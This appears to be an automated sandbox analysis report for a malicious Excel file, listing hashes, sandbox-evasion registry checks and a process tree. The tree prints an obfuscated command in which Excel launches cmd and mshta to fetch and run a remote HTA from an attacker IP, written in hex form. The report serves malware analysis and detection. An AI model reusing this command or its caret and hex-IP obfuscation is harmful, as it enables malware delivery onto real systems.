Analysis
-
max time kernel
133s -
max time network
138s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
20/11/2024, 05:29
Behavioral task
behavioral1
Sample
a9a6bde09c84bbea924f8692ee2f1ccf15a71c706280ea1c4a7d2ab189fce030.xls
Resource
win7-20240729-en
Behavioral task
behavioral2
Sample
a9a6bde09c84bbea924f8692ee2f1ccf15a71c706280ea1c4a7d2ab189fce030.xls
Resource
win10v2004-20241007-en
General
-
Target
a9a6bde09c84bbea924f8692ee2f1ccf15a71c706280ea1c4a7d2ab189fce030.xls
-
Size
101KB
-
MD5
a21898a09a41f3db7770516b83c1ad57
-
SHA1
fe0a3c3f087cc11db0e9ed13889b231a45e29d79
-
SHA256
a9a6bde09c84bbea924f8692ee2f1ccf15a71c706280ea1c4a7d2ab189fce030
-
SHA512
f957b60ed9270c92cfbb70e99f39f9d15deb7bfd3fe916b3fbda4de17e5ac39e0160b119f076482ca3981aad01edac369cc90320359c0cbb0f91b74d8f321eb8
-
SSDEEP
3072:n/k3hbdlylKsgqopeJBWhZFGkE+cL2NdAFxe53lGvFTQ3IzxgdrvxpU0OKvMB:/k3hbdlylKsgqopeJBWhZFVE+W2NdAOK
Malware Config
Extracted
http://185.7.214.7/fer/fe3.html
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 4912 4184 cmd.exe 82 -
Blocklisted process makes network request 1 IoCs
flow pid Process 20 2332 mshta.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 4184 EXCEL.EXE -
Suspicious use of SetWindowsHookEx 12 IoCs
pid Process 4184 EXCEL.EXE 4184 EXCEL.EXE 4184 EXCEL.EXE 4184 EXCEL.EXE 4184 EXCEL.EXE 4184 EXCEL.EXE 4184 EXCEL.EXE 4184 EXCEL.EXE 4184 EXCEL.EXE 4184 EXCEL.EXE 4184 EXCEL.EXE 4184 EXCEL.EXE -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 4184 wrote to memory of 4912 4184 EXCEL.EXE 87 PID 4184 wrote to memory of 4912 4184 EXCEL.EXE 87 PID 4912 wrote to memory of 2332 4912 cmd.exe 89 PID 4912 wrote to memory of 2332 4912 cmd.exe 89
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\a9a6bde09c84bbea924f8692ee2f1ccf15a71c706280ea1c4a7d2ab189fce030.xls"1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4184 -
C:\Windows\SYSTEM32\cmd.execmd /c m^sh^t^a h^tt^p^:/^/0xb907d607/fer/fe3.html2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:4912 -
C:\Windows\system32\mshta.exemshta http://0xb907d607/fer/fe3.html3⤵
- Blocklisted process makes network request
PID:2332
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms
Filesize671B
MD5fbf2e5a7489fd4d7162f8ce65f3a9ab0
SHA12aaaefd88c7598652cd2c4a554ac5b43b8361bb1
SHA2561ad1266dafde0ac6f3d18b15c11ba66960dcba12856a359d7812a985969687e3
SHA512a47184ac989191b29106e5123b46c17d8744779205c05503ac5ef1d7b614634840d5c31485d8a18103d4c3503ce6b0224330993c610ffd4de81814a996e0676c